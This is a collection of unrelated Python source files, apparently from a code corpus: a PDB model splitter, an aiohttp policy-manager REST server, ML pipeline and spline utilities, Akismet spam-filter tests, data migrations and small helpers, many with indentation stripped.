.short_caption = Split multi-model PDB file
.caption = This utility will separate a multi-model PDB file (such as an \
NMR ensemble) into individual files for each model. The output files \
will be named similarly to the input file but ending in _1.pdb, _2.pdb, \
etc.
.style = auto_align box caption_img:icons/custom/iotbx.pdb.join_fragment_files.png
{
file_name = None
.type = path
.short_caption = PDB file
.style = file_type:pdb input_file bold
output_dir = None
.type = path
.short_caption = Output directory
.style = directory default_cwd bold
}
"""
def run(args=(), params=None, out=None):
if (out is None):
out = sys.stdout
if (params is None):
if (len(args) == 0):
raise Usage("""
iotbx.pdb.split_models ensemble.pdb [output_dir=/path/...]
Splits a multi-model PDB file into separate files for each model.
""")
import iotbx.phil
cmdline = iotbx.phil.process_command_line_with_files(
args=args,
master_phil_string=master_phil,
pdb_file_def="split_models.file_name",
directory_def="split_models.output_dir")
params = cmdline.work.extract()
validate_params(params)
from iotbx import file_reader
pdb_in = file_reader.any_file(params.split_models.file_name, force_type="pdb")
pdb_in.check_file_type("pdb")
hierarchy = pdb_in.file_object.hierarchy
if (len(hierarchy.models()) <= 1):
raise Sorry("The PDB file %s already has a single model." %
params.split_models.file_name)
pdb_rel_path = os.path.basename(params.split_models.file_name)
if (pdb_rel_path.endswith(".gz")):
pdb_rel_path = pdb_rel_path[:-3]
elif (pdb_rel_path.endswith(".Z")):
pdb_rel_path = pdb_rel_path[:-2]
base_name = os.path.splitext(pdb_rel_path)[0]
if (params.split_models.output_dir is None):
params.split_models.output_dir = os.getcwd()
output_base = os.path.join(params.split_models.output_dir, base_name)
return split_models(
hierarchy=hierarchy,
crystal_symmetry=pdb_in.file_object.crystal_symmetry(),
output_base=output_base,
original_file=params.split_models.file_name,
log=out)
def split_models(hierarchy,
crystal_symmetry,
output_base,
original_file=None,
log=None):
if (log is None) : log = null_out()
import iotbx.pdb.hierarchy
n_models = len(hierarchy.models())
file_names = []
  for k, model in enumerate(hierarchy.models(), start=1):
new_hierarchy = iotbx.pdb.hierarchy.root()
new_hierarchy.append_model(model.detached_copy())
if (model.id == ""):
model_id = str(k)
else :
model_id = model.id.strip()
output_file = "%s_%s.pdb" % (output_base, model_id)
f = open(output_file, "w")
if (crystal_symmetry is not None):
print(iotbx.pdb.format_cryst1_and_scale_records(
crystal_symmetry=crystal_symmetry,
write_scale_records=True), file=f)
print("REMARK Model %d of %d" % (k, n_models), file=f)
if (original_file is not None):
print("REMARK Original file:", file=f)
print("REMARK %s" % original_file, file=f)
f.write(new_hierarchy.as_pdb_string())
f.close()
file_names.append(output_file)
print("Wrote %s" % output_file, file=log)
return file_names
def validate_params(params):
if (params.split_models.file_name is None):
raise Sorry("Please specify a PDB file to split!")
elif (not os.path.isfile(params.split_models.file_name)):
raise Sorry("The PDB file '%s' does not exist or is not a file." %
params.split_models.file_name)
if (params.split_models.output_dir is not None):
if (not os.path.isdir(params.split_models.output_dir)):
raise Sorry(("The specified output directory '%s' does not exist or is "+
"not a directory.") % params.split_models.output_dir)
return True
if (__name__ == "__main__"):
run(sys.argv[1:])
|
1698336
|
import asyncio
import json
import logging
import random
from contextlib import suppress
import pmdefaults as PM
try:
import aiohttp
from aiohttp import web
except ImportError as e:
web = None
logging.warning("aiohttp in required to start the REST interface, but it is not installed")
try:
resthelper_loaded = True
import resthelper
except ImportError as e:
resthelper_loaded = False
profiles = None
cib = None
pib = None
server = None
app = None
loop = None
def gen_hello_msg():
host_info = {'host-uid': PM.CLIENT_UID,
'management-address': PM.REST_IP,
'rest-port': PM.REST_PORT,
'client-type': 'neat'}
if resthelper_loaded:
ips = resthelper.get_local_ips()
host_info['local-addresses'] = ips
else:
logging.warning('Local addresses not available')
hello_msg = json.dumps({"input": host_info})
return hello_msg
async def controller_announce():
"""
Register NEAT client with a remote controller
and send hello message every PM.CONTROLLER_ANNOUNCE seconds
"""
if not PM.CONTROLLER_REST:
return
while True:
sleep_time = min(random.expovariate(1 / PM.CONTROLLER_ANNOUNCE), PM.CONTROLLER_ANNOUNCE * 3)
print("Notifying controller at %s (repeat in %1.0fs)" % (PM.CONTROLLER_REST, sleep_time))
conn = aiohttp.TCPConnector(local_addr=(PM.REST_IP, 0))
auth = aiohttp.BasicAuth(PM.CONTROLLER_USER, PM.CONTROLLER_PASS)
async with aiohttp.ClientSession(connector=conn, auth=auth) as session:
try:
async with session.post(PM.CONTROLLER_REST, data=gen_hello_msg(),
headers={'content-type': 'application/json'}) as resp:
# logging.debug('announce addr: %s:%s' % resp.connection._protocol.transport.get_extra_info('sockname'))
if resp.status != 200:
logging.warning("Controller provided an invalid response")
print(resp)
html = await resp.text()
except (ValueError, aiohttp.ClientConnectionError) as e:
print(e)
await asyncio.sleep(sleep_time)
async def handle_refresh(request):
logging.info("Reloading PIB...")
pib.reload_files()
logging.info("Reloading profiles...")
profiles.reload_files()
logging.info("Reloading CIB...")
cib.reload_files()
return web.Response(text='PM repositories reloaded.')
async def handle_pib(request):
uid = request.match_info.get('uid')
if uid is None:
text = json.dumps(list(pib.index.keys()))
return web.Response(text=text)
logging.info("PIB request for uid %s" % (uid))
try:
text = pib.index[uid].json()
except KeyError as e:
return web.Response(status=404, text='unknown UID')
return web.Response(text=text)
async def handle_pib_put(request):
"""
Test using: curl -H 'Content-Type: application/json' -T test.policy localhost:45888/pib/23423
"""
assert request.content_type == 'application/json'
uid = request.match_info.get('uid')
logging.info("Received new policy entry with uid \'%s\'" % (uid))
new_policy = await request.text()
pib.import_json(new_policy, uid)
return web.Response(text="OK")
async def handle_pib_delete(request):
"""
Delete PIB entry with specific UID
Test using: curl -H 'Content-Type: application/json' -X DELETE localhost:45888/pib/1234
"""
assert request.content_type == 'application/json'
uid = request.match_info.get('uid')
logging.info("Removing policy entry with uid \'%s\'" % (uid))
try:
pib.remove(uid)
except KeyError:
text = "Policy not found (uid \'%s\')." % uid
logging.warning(text)
return web.Response(status=404, text=text)
return web.Response(text="Policy removed")
async def handle_cib_rows(request):
rows = []
for i in cib.rows:
rows.append(i.dict())
text = json.dumps(rows, indent=4)
return web.Response(text=text)
async def handle_cib(request):
uid = request.match_info.get('uid')
if uid is None:
text = json.dumps(list(cib.keys()))
return web.Response(text=text)
logging.info("CIB request for uid %s" % (uid))
try:
text = cib[uid].json()
except KeyError as e:
return web.Response(status=404, text='unknown UID')
return web.Response(text=text)
async def handle_cib_put(request):
uid = request.match_info.get('uid')
if uid is None:
text = json.dumps(list(cib.keys()))
return web.Response(text=text)
assert request.content_type == 'application/json'
logging.info("new CIB entry with uid %s" % (uid))
new_cib = await request.text()
cib.import_json(new_cib, uid)
return web.Response(text="OK")
async def handle_cib_delete(request):
"""
Delete CIB node with specific UID
Test using: curl -H 'Content-Type: application/json' -X DELETE localhost:45888/cib/1234
"""
assert request.content_type == 'application/json'
uid = request.match_info.get('uid')
logging.info("Removing CIB node with uid \'%s\'" % (uid))
try:
cib.remove(uid)
except KeyError:
text = "CIB node not found (uid \'%s\')." % uid
logging.warning(text)
return web.Response(status=404, text=text)
return web.Response(text="CIB node removed")
async def handle_rest(request):
name = str(request.match_info.get('name')).lower()
if name not in ('pib', 'cib'):
# FIXME return proper response
return web.Response(status=404)
uid = request.match_info.get('uid', 0)
text = "request for %s %s" % (name, uid)
return web.Response(text=text)
def init_rest_server(asyncio_loop, profiles_ref, cib_ref, pib_ref, rest_port=None):
"""
Initialize and register REST server.
"""
if web is None:
logging.info("REST server not available because the aiohttp module is not installed.")
return
    global pib, cib, profiles, server, loop, app
loop = asyncio_loop
cib = cib_ref
pib = pib_ref
profiles = profiles_ref
if rest_port:
PM.REST_PORT = rest_port
pmrest = web.Application()
app = pmrest
pmrest.router.add_get('/', handle_rest)
pmrest.router.add_get('/reload', handle_refresh)
pmrest.router.add_get('/pib', handle_pib)
pmrest.router.add_get('/pib/{uid}', handle_pib)
    pmrest.router.add_get('/cib', handle_cib)
    # register the literal /cib/rows route before the variable /cib/{uid} route,
    # otherwise the {uid} pattern would capture "rows" first
    pmrest.router.add_get('/cib/rows', handle_cib_rows)
    pmrest.router.add_get('/cib/{uid}', handle_cib)
pmrest.router.add_put('/cib/{uid}', handle_cib_put)
pmrest.router.add_put('/pib/{uid}', handle_pib_put)
pmrest.router.add_delete('/pib/{uid}', handle_pib_delete)
pmrest.router.add_delete('/cib/{uid}', handle_cib_delete)
handler = pmrest.make_handler()
f = asyncio_loop.create_server(handler, PM.REST_IP, PM.REST_PORT)
print("Initializing REST server on %s:%d" % (PM.REST_IP, PM.REST_PORT))
try:
server = asyncio_loop.run_until_complete(f)
except OSError as e:
print(e)
return
asyncio.ensure_future(controller_announce())
def close():
# cancel all running tasks:
pending = asyncio.Task.all_tasks()
for task in pending:
task.cancel()
    # Now we should await the task so it can execute its cancellation.
    # A cancelled task raises asyncio.CancelledError, which we can suppress:
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
# TODO implement http://aiohttp.readthedocs.io/en/stable/web.html#graceful-shutdown
server.close()
loop.run_until_complete(server.wait_closed())
loop.run_until_complete(app.shutdown())
loop.run_until_complete(app.cleanup())
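# A minimal sketch (hypothetical profiles/cib/pib repository objects) of wiring
# the REST server into an asyncio loop and shutting it down cleanly.
def _example_start(profiles_ref, cib_ref, pib_ref):
    asyncio_loop = asyncio.get_event_loop()
    init_rest_server(asyncio_loop, profiles_ref, cib_ref, pib_ref, rest_port=45888)
    try:
        asyncio_loop.run_forever()
    finally:
        close()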
|
1698339
|
from pyhafas import HafasClient
from pyhafas.profile import VSNProfile
def test_vsn_locations_request():
client = HafasClient(VSNProfile())
locations = client.locations(term="Göttingen Bahnhof/ZOB")
assert len(locations) >= 1
|
1698344
|
from typing import Callable
import pytest
from tests.taxonomy.conftest import TestDirectory, validate_taxonomy
@pytest.mark.parametrize(
"defect",
[(1, 79), (2, 120), (3, 122), (4, 86), (5, 40)],
)
def test_xbps(defect, defect_path: Callable[[int, int], TestDirectory], gitenv):
index, case = defect
test_dir = defect_path(index, case)
validate_taxonomy(test_dir, index, case)
|
1698357
|
import requests, os
import json
is_prod = True
webhook_url = os.environ.get('SLACKBOT_WEBHOOK_URL', '')
def post_health(message):
if not is_prod:
return
r = requests.post(webhook_url, data=json.dumps({"text": message}), headers={'content-type':'application/json'})
return r
|
1698376
|
from time import time
import numpy as np
from cd4ml.get_encoder import get_trained_encoder
from cd4ml.logger.fluentd_logging import FluentdLogger
from cd4ml.model_tracking import tracking
from cd4ml.model_tracking.validation_metrics import get_validation_metrics
from cd4ml.utils.problem_utils import Specification
from cd4ml.ml_model import MLModel
from cd4ml.feature_importance import get_feature_importance
from cd4ml.splitter import splitter
from cd4ml.model_tracking.validation_plots import get_validation_plot
from cd4ml.utils.utils import get_uuid
from pathlib import Path
import json
import logging
logger = logging.getLogger(__name__)
class ProblemBase:
"""
    Generic interface for ML problems.
    Implementations need to add various data elements and methods.
"""
def __init__(self,
problem_name,
data_downloader='default',
ml_pipeline_params_name='default',
feature_set_name='default',
algorithm_name='default',
algorithm_params_name='default'):
# this is the unique identifier for every model created
self.model_id = get_uuid()
self.logger = logging.getLogger(__name__)
self.fluentd_logger = FluentdLogger()
self.data_downloader = data_downloader
self.problem_name = problem_name
self.feature_set_name = feature_set_name
self.ml_pipeline_params_name = ml_pipeline_params_name
self.algorithm_name = algorithm_name
self.algorithm_params_name = algorithm_params_name
self.ml_pipeline_params = self.get_ml_pipeline_params(ml_pipeline_params_name)
self.logger.info("Created model_id: %s" % self.model_id)
if algorithm_name == 'default':
self.resolved_algorithm_name = self.ml_pipeline_params['default_algorithm']
else:
self.resolved_algorithm_name = algorithm_name
self.specification = self.make_specification()
# methods to be implemented
# when called on pipeline_params, returns a data stream
self._stream_data = None
        # when given a row of data, returns True or False depending on
        # whether it is in training or validation
# override if need a special case
self.training_filter = None
self.validation_filter = None
# function which runs on a function returning an iterable
# of (true, predicted) values
# and returns a dictionary of metrics
# might have to run multiple times so needs to create new
# streams when called
self.get_validation_metrics = None
# filled in by methods in base class
self.trained_model = None
self.validation_metrics = None
self.encoder = None
self.ml_model = None
self.tracker = None
self.feature_data = None
self.importance = None
self.training_filter, self.validation_filter = splitter(self.ml_pipeline_params)
feature_set_class = self.get_feature_set_constructor(feature_set_name)
self.feature_set = feature_set_class(self.ml_pipeline_params['identifier_field'],
self.ml_pipeline_params['target_field'],
{})
self.algorithm_params = self.get_algorithm_params(self.resolved_algorithm_name,
self.algorithm_params_name)
def stream_processed(self):
return self._stream_data(self.problem_name)
def stream_features(self):
return (self.feature_set.features(processed_row) for processed_row in self.stream_processed())
def prepare_feature_data(self):
pass
def get_encoder(self, write=False, read_from_file=False):
        # TODO: train on all features or just training?
self.prepare_feature_data()
start = time()
ml_fields = self.feature_set.ml_fields()
omitted = self.feature_set.params['encoder_untransformed_fields']
self.encoder = get_trained_encoder(self.stream_features(),
ml_fields,
self.problem_name,
write=write,
read_from_file=read_from_file,
base_features_omitted=omitted)
self.encoder.add_numeric_stats(self.stream_features())
runtime = time() - start
self.logger.info('Encoder time: {0:.1f} seconds'.format(runtime))
def training_stream(self):
return (row for row in self.stream_processed() if self.training_filter(row))
def validation_stream(self):
return (row for row in self.stream_processed() if self.validation_filter(row))
def train(self):
if self.ml_model is not None:
self.logger.warning('Model is already trained, cannot retrain')
return
self.logger.info('Starting training')
start = time()
if self.encoder is None:
self.get_encoder()
self.ml_model = MLModel(self.specification.spec['algorithm_name_actual'],
self.algorithm_params,
self.feature_set,
self.encoder,
self.ml_pipeline_params['training_random_seed'])
if self.tracker:
self.tracker.log_algorithm_params(self.algorithm_params)
self.ml_model.train(self.training_stream())
model_name = self.specification.spec['algorithm_name_actual']
self.importance = get_feature_importance(self.ml_model.trained_model, model_name, self.encoder)
runtime = time() - start
self.logger.info('Training time: {0:.1f} seconds'.format(runtime))
def true_target_stream(self, stream):
target_name = self.feature_set.target_field
return (row[target_name] for row in stream)
def _write_validation_info(self):
true_validation_target = list(self.true_target_stream(self.validation_stream()))
validation_predictions = list(self.ml_model.predict_processed_rows(self.validation_stream()))
if self.tracker:
if self.ml_model.model_type == 'regressor':
validation_plot = get_validation_plot(true_validation_target,
validation_predictions)
self.tracker.log_validation_plot(validation_plot)
self.tracker.log_metrics(self.validation_metrics)
self.fluentd_logger.log('validation_metrics', self.validation_metrics)
def validate(self):
# a batch step
self.logger.info('Starting validating')
start = time()
logger.info('Getting predictions')
true_validation_target = list(self.true_target_stream(self.validation_stream()))
validation_prediction = list(self.ml_model.predict_processed_rows(self.validation_stream()))
if self.ml_model.model_type == 'classifier':
validation_pred_prob = np.array(list(self.ml_model.predict_processed_rows(self.validation_stream(),
prob=True)))
target_levels = self.ml_model.trained_model.classes_
elif self.ml_model.model_type == 'regressor':
validation_pred_prob = None
target_levels = None
else:
raise ValueError('Do not understand classification type: %s' % self.ml_model.model_type)
logger.info('Done with predictions')
self.logger.info('Getting validation metrics')
validation_metric_names = self.ml_pipeline_params['validation_metric_names']
self.validation_metrics = get_validation_metrics(validation_metric_names,
true_validation_target,
validation_prediction,
validation_pred_prob,
target_levels)
self.logger.info('Writing validation info')
self._write_validation_info()
runtime = time() - start
self.logger.info('Validation time: {0:.1f} seconds'.format(runtime))
def write_ml_model(self):
self.tracker.log_model(self.ml_model)
def setup_tracker(self):
self.tracker = tracking.Track(self.model_id, self.specification.spec)
def run_all(self):
start = time()
self.setup_tracker()
self.tracker.log_ml_pipeline_params(self.ml_pipeline_params)
self.download_data()
self.get_encoder()
self.train()
self.write_ml_model()
self.validate()
runtime = time() - start
self.tracker.save_results()
self.logger.info('All ML steps time: {0:.1f} seconds'.format(runtime))
self.logger.info('Finished model: %s' % self.model_id)
    def download_data(self):
        raise NotImplementedError("This method must be implemented by a subclass")
@staticmethod
def get_feature_set_constructor(feature_set_name):
        raise NotImplementedError("This method must be implemented by a subclass")
def get_ml_pipeline_params(self, ml_pipeline_params_name):
path = 'ml_pipelines/{}.json'.format(ml_pipeline_params_name)
return self.read_json_file_for_current_problem_as_dict(path)
def get_algorithm_params(self, algorithm_name, algorithm_params_name):
path = 'algorithms/{}/{}.json'.format(algorithm_name, algorithm_params_name)
return self.read_json_file_for_current_problem_as_dict(path)
def make_specification(self):
return Specification(self.problem_name,
self.data_downloader,
self.ml_pipeline_params_name,
self.feature_set_name,
self.algorithm_name,
self.algorithm_params_name,
self.resolved_algorithm_name)
def read_json_file_for_current_problem_as_dict(self, file_path):
path = Path(Path(__file__).parent, self.problem_name, file_path)
with open(path, "r") as file:
return json.load(file)
def __repr__(self):
# make it printable
messages = ['Problem']
for k, v in self.__dict__.items():
if v is None:
continue
if str(v.__class__) == "<class 'function'>":
continue
messages.append("%s: \n%s\n" % (k, v))
return '\n'.join(messages)
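# A minimal sketch (hypothetical feature-set module) of the two hooks a
# concrete problem must override on top of ProblemBase.
class _ExampleProblem(ProblemBase):
    def download_data(self):
        # no-op: assume the raw data is already on disk
        pass

    @staticmethod
    def get_feature_set_constructor(feature_set_name):
        # hypothetical import; must return a class accepting
        # (identifier_field, target_field, params)
        from example_features import ExampleFeatureSet
        return ExampleFeatureSet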
|
1698384
|
import numpy as np
import scipy.interpolate as si
def euclidean_distance(a, b):
diff = a - b
return np.sqrt(np.dot(diff, diff))
# source: https://stackoverflow.com/questions/34803197/fast-b-spline-algorithm-with-numpy-scipy
def bspline(cv, n=100, degree=3, periodic=False):
"""Calculate n samples on a bspline
    cv : Array of control vertices
n : Number of samples to return
degree: Curve degree
periodic: True - Curve is closed
"""
cv = np.asarray(cv)
count = cv.shape[0]
# Closed curve
if periodic:
kv = np.arange(-degree, count + degree + 1)
factor, fraction = divmod(count + degree + 1, count)
cv = np.roll(np.concatenate((cv,) * factor + (cv[:fraction],)), -1, axis=0)
degree = np.clip(degree, 1, degree)
# Opened curve
else:
degree = np.clip(degree, 1, count - 1)
kv = np.clip(np.arange(count + degree + 1) - degree, 0, count - degree)
# Return samples
max_param = count - (degree * (1 - periodic))
spl = si.BSpline(kv, cv, degree)
return spl(np.linspace(0, max_param, n))
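# A minimal usage sketch: sample 50 points on an open cubic b-spline through
# four hypothetical control vertices.
def _bspline_example():
    cv = np.array([[0.0, 0.0], [1.0, 2.0], [3.0, 3.0], [4.0, 0.0]])
    return bspline(cv, n=50, degree=3, periodic=False)  # shape (50, 2)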
# from https://en.wikipedia.org/wiki/Centripetal_Catmull%E2%80%93Rom_spline
def CatmullRomSpline(P0, P1, P2, P3, nPoints=100):
"""
P0, P1, P2, and P3 should be (x,y) point pairs that define the Catmull-Rom spline.
nPoints is the number of points to include in this curve segment.
"""
# Convert the points to numpy so that we can do array multiplication
P0, P1, P2, P3 = map(np.array, [P0, P1, P2, P3])
    # Calculate t0 to t3
alpha = 0.5
def tj(ti, Pi, Pj):
xi, yi = Pi
xj, yj = Pj
return (((xj - xi) ** 2 + (yj - yi) ** 2) ** 0.5) ** alpha + ti
t0 = 0
t1 = tj(t0, P0, P1)
t2 = tj(t1, P1, P2)
t3 = tj(t2, P2, P3)
# Only calculate points between P1 and P2
t = np.linspace(t1, t2, nPoints)
# Reshape so that we can multiply by the points P0 to P3
# and get a point for each value of t.
t = t.reshape(len(t), 1)
A1 = (t1 - t) / (t1 - t0) * P0 + (t - t0) / (t1 - t0) * P1
A2 = (t2 - t) / (t2 - t1) * P1 + (t - t1) / (t2 - t1) * P2
A3 = (t3 - t) / (t3 - t2) * P2 + (t - t2) / (t3 - t2) * P3
B1 = (t2 - t) / (t2 - t0) * A1 + (t - t0) / (t2 - t0) * A2
B2 = (t3 - t) / (t3 - t1) * A2 + (t - t1) / (t3 - t1) * A3
C = (t2 - t) / (t2 - t1) * B1 + (t - t1) / (t2 - t1) * B2
return C
def CatmullRomChain(P, n_points=100):
"""
    Calculate the Catmull-Rom curve for a chain of points and return the combined curve.
"""
sz = len(P)
# The curve C will contain an array of (x,y) points.
C = []
for i in range(sz - 3):
c = CatmullRomSpline(P[i], P[i + 1], P[i + 2], P[i + 3], nPoints=n_points)
C.extend(c)
return C
def catmull_rom_spline(coords, n_points=10):
coords = list(map(np.array, coords))
coords.insert(0, coords[0] - (coords[1] - coords[0]))
coords.append(coords[-1] + (coords[-1] - coords[-2]))
c = CatmullRomChain(coords, n_points=n_points)
return np.array(c)
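# A minimal usage sketch (hypothetical control points, not part of the original
# module): sample both spline variants over the same four points.
if __name__ == '__main__':
    pts = [(0.0, 0.0), (1.0, 2.0), (3.0, 3.0), (4.0, 0.0)]
    b = bspline(pts, n=50, degree=3)          # -> (50, 2) points on the b-spline
    c = catmull_rom_spline(pts, n_points=10)  # -> (30, 2); passes through pts
    print(b.shape, c.shape)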
|
1698393
|
from __future__ import with_statement
import datetime
import sys
import os
try:
from urllib.parse import parse_qsl
except ImportError:
from urlparse import parse_qsl
import requests
import requests_mock
from requests.exceptions import ConnectTimeout
from akismet import Akismet, SpamStatus, AKISMET_CHECK_URL, AKISMET_DOMAIN, AKISMET_VERSION, AKISMET_SUBMIT_SPAM_URL, \
AKISMET_SUBMIT_HAM_URL
from akismet.exceptions import AkismetServerError, MissingParameterError
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0'
EVIL_USER_AGENT = 'Bot Evil/0.1'
class TestAkismet(unittest.TestCase):
akismet = None
def setUp(self):
self.api_key = 'mock'
self.is_test = True
self.blog = 'http://127.0.0.1'
self.user_ip = '127.0.0.1'
self.akismet = Akismet('mock', is_test=self.is_test)
self.mock = requests_mock.Mocker()
self.mock.start()
def tearDown(self):
self.mock.stop()
def _get_url(self, url_format, api_key=None):
return url_format.format(
protocol='https',
api_key=api_key or self.api_key,
domain=AKISMET_DOMAIN,
version=AKISMET_VERSION,
)
def _get_default_parameters(self):
return {
'user_ip': self.user_ip,
'referrer': 'unknown',
'user_agent': USER_AGENT,
'charset': Akismet.charset,
'is_test': str(self.is_test),
'blog': self.blog,
}
def test_check(self):
parameters = dict(self._get_default_parameters(), user_agent=USER_AGENT)
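        # Akismet's comment-check endpoint answers with a literal "true"/"false"
        # body; mocking json=False yields "false", which the client maps to Ham.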
self.mock.post(self._get_url(AKISMET_CHECK_URL), json=False,
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.assertEqual(self.akismet.check(self.user_ip, USER_AGENT, blog=self.blog), SpamStatus.Ham)
def test_check_spam(self):
comment_author = 'viagra-<PASSWORD>'
parameters = dict(self._get_default_parameters(), user_agent=EVIL_USER_AGENT,
comment_author=comment_author)
self.mock.post(self._get_url(AKISMET_CHECK_URL), json=True,
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.assertEqual(self.akismet.check(self.user_ip, EVIL_USER_AGENT, comment_author=comment_author,
blog=self.blog), SpamStatus.ProbableSpam)
def test_invalid_api_key(self):
api_key = 'invalid_api_key'
self.mock.post(self._get_url(AKISMET_CHECK_URL, api_key=api_key), text='')
akismet = Akismet(api_key, is_test=True)
with self.assertRaises(AkismetServerError):
akismet.check(self.user_ip, EVIL_USER_AGENT, blog=self.blog)
def test_submit_spam(self):
parameters = dict(self._get_default_parameters(), user_agent=EVIL_USER_AGENT, is_spam='True')
self.mock.post(self._get_url(AKISMET_SUBMIT_SPAM_URL), text="Thanks for making the web a better place.",
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.akismet.submit_spam(self.user_ip, EVIL_USER_AGENT, blog=self.blog)
def test_submit_ham(self):
parameters = dict(self._get_default_parameters(), user_agent=USER_AGENT, is_spam='False')
self.mock.post(self._get_url(AKISMET_SUBMIT_HAM_URL), text="Thanks for making the web a better place.",
additional_matcher=lambda request: dict(parse_qsl(request.text)) == parameters)
self.akismet.submit_ham(self.user_ip, USER_AGENT, blog=self.blog)
def test_datetime(self):
blog_url = 'http://127.0.0.1'
comment_date = datetime.datetime(2016, 4, 16, 15, 12, 5)
comment_post_modified = datetime.datetime(2016, 4, 16, 16, 27, 31)
data = self.akismet._get_parameters({'blog': blog_url, 'comment_post_modified': comment_post_modified,
'comment_date': comment_date})
        for dtkey, dtvalue in [('comment_date', comment_date),
                               ('comment_post_modified', comment_post_modified)]:
            self.assertIn('{0}_gmt'.format(dtkey), data)
            self.assertNotIn(dtkey, data)
            self.assertEqual(data['{0}_gmt'.format(dtkey)], dtvalue.isoformat())
def test_timeout(self):
self.mock.post(self._get_url(AKISMET_SUBMIT_HAM_URL), exc=ConnectTimeout)
with self.assertRaises(requests.ConnectionError):
self.akismet.submit_ham(self.user_ip, USER_AGENT, blog=self.blog)
def test_require_blog_param(self):
with self.assertRaises(MissingParameterError):
self.akismet._get_parameters({})
if __name__ == '__main__':
unittest.main()
|
1698403
|
from protocols import participant_1_0_0
from protocols import participant_1_0_3
from protocols.migration import BaseMigration
class MigrationParticipants103To100(BaseMigration):
old_model = participant_1_0_3
new_model = participant_1_0_0
def migrate_cancer_participant(self, cancer_participant):
migrated_participant = self.new_model.CancerParticipant.fromJsonDict(cancer_participant.toJsonDict())
migrated_participant.LDPCode = next((tumour_sample.LDPCode for tumour_sample in cancer_participant.tumourSamples), None)
migrated_participant.primaryDiagnosisDisease = None
if isinstance(cancer_participant.primaryDiagnosisDisease, list):
migrated_participant.primaryDiagnosisDisease = ','.join(cancer_participant.primaryDiagnosisDisease)
migrated_participant.primaryDiagnosisSubDisease = None
if isinstance(cancer_participant.primaryDiagnosisSubDisease, list):
migrated_participant.primaryDiagnosisSubDisease = ','.join(cancer_participant.primaryDiagnosisSubDisease)
migrated_participant.assignedICD10 = None
if isinstance(cancer_participant.assignedICD10, list):
migrated_participant.assignedICD10 = ','.join(cancer_participant.assignedICD10)
migrated_participant.tumourSamples = self.migrate_tumour_samples(
tumour_samples=cancer_participant.tumourSamples
)
migrated_participant.germlineSamples = self.migrate_germline_samples(
germline_samples=cancer_participant.germlineSamples
)
migrated_participant.matchedSamples = self.migrate_matched_samples(
matched_samples=cancer_participant.matchedSamples
)
return self.validate_object(
object_to_validate=migrated_participant, object_type=self.new_model.CancerParticipant
)
def migrate_matched_samples(self, matched_samples):
return [self.migrate_matched_sample(matched_sample=matched_sample) for matched_sample in matched_samples]
def migrate_matched_sample(self, matched_sample):
return self.new_model.MatchedSamples().fromJsonDict(matched_sample.toJsonDict())
def migrate_germline_samples(self, germline_samples):
return [self.migrate_germline_sample(germline_sample=germline_sample) for germline_sample in germline_samples]
def migrate_germline_sample(self, germline_sample):
return self.new_model.GermlineSample().fromJsonDict(germline_sample.toJsonDict())
def migrate_tumour_samples(self, tumour_samples):
return [self.migrate_tumour_sample(tumour_sample=tumour_sample) for tumour_sample in tumour_samples]
def migrate_tumour_sample(self, tumour_sample):
"""
The tumourId will be migrated when the value can be parsed to an integer, otherwise it will be replaced
by the labSampleId.
:param tumour_sample:
:return:
"""
migrated_tumour_sample = self.new_model.TumourSample().fromJsonDict(
jsonDict=tumour_sample.toJsonDict()
)
migrated_tumour_sample.tumourId = None
if tumour_sample.tumourId is not None:
try:
migrated_tumour_sample.tumourId = int(tumour_sample.tumourId)
except ValueError:
migrated_tumour_sample.tumourId = tumour_sample.labSampleId
migrated_tumour_sample.tumourType = tumour_sample.diseaseType
migrated_tumour_sample.tumourSubType = tumour_sample.diseaseSubType
migrated_tumour_sample.phase = tumour_sample.tumourType
return self.validate_object(
object_to_validate=migrated_tumour_sample, object_type=self.new_model.TumourSample
)
|
1698415
|
from aiogram.dispatcher.filters.state import State, StatesGroup
class ConfigFlow(StatesGroup):
waiting_for_api_key = State()
class SettingsFlow(StatesGroup):
waiting_for_setting_select = State()
waiting_for_new_key = State()
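# Usage sketch (aiogram 2.x FSM; an assumption about the surrounding bot code):
# a handler enters a state with `await ConfigFlow.waiting_for_api_key.set()`
# and leaves it with `await state.finish()`.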
|
1698468
|
from typing import AnyStr, List
from pyre_extensions import safe_json
from backend.common.datafeed_parsers.exceptions import ParserInputException
from backend.common.models.alliance import EventAlliance
from backend.common.models.keys import TeamKey
from backend.common.models.team import Team
class JSONAllianceSelectionsParser:
@staticmethod
def parse(alliances_json: AnyStr) -> List[EventAlliance]:
"""
Parse JSON that contains team_keys
Format is as follows:
[[captain1, pick1-1, pick1-2(, ...)],
['frc254', 'frc971', 'frc604'],
...
[captain8, pick8-1, pick8-2(, ...)]]
"""
alliances = safe_json.loads(alliances_json, List[List[TeamKey]])
alliance_selections: List[EventAlliance] = []
for alliance in alliances:
is_empty = True
selection: EventAlliance = {"picks": [], "declines": []}
for team_key in alliance:
if not Team.validate_key_name(team_key):
raise ParserInputException(
"Bad team_key: '{}'. Must follow format: 'frcXXX'".format(
team_key
)
)
else:
selection["picks"].append(team_key)
is_empty = False
if not is_empty:
alliance_selections.append(selection)
return alliance_selections
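# A minimal usage sketch (hypothetical alliances, not part of the original
# module); assumes the backend.common imports above resolve.
if __name__ == "__main__":
    raw = '[["frc254", "frc971", "frc604"], ["frc1678", "frc8", "frc4414"]]'
    print(JSONAllianceSelectionsParser.parse(raw))
    # -> [{'picks': ['frc254', 'frc971', 'frc604'], 'declines': []},
    #     {'picks': ['frc1678', 'frc8', 'frc4414'], 'declines': []}]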
|
1698507
|
MOCK_USERS = [{"email": "<EMAIL>", "salt": "8Fb23mMNHD5Zb8pr2qWA3PE9bH0=", "hashed":
"1736f83698df3f8153c1fbd6ce2840f8aace4f200771a46672635374073cc876cf0aa6a31f780e576578f791b5555b50df46303f0c3a7f2d21f91aa1429ac22e"}]
class MockDBHelper:
def get_user(self, email):
user = [x for x in MOCK_USERS if x.get("email") == email]
if user:
return user[0]
return None
def add_user(self, email, salt, hashed):
MOCK_USERS.append({"email": email, "salt": salt, "hashed": hashed})
|
1698585
|
from carriage import Row, X
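# X is carriage's expression placeholder: attribute/item access and operator
# expressions on X build callables that evaluate against the argument supplied
# later, as the assertions below exercise.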
def test_basic():
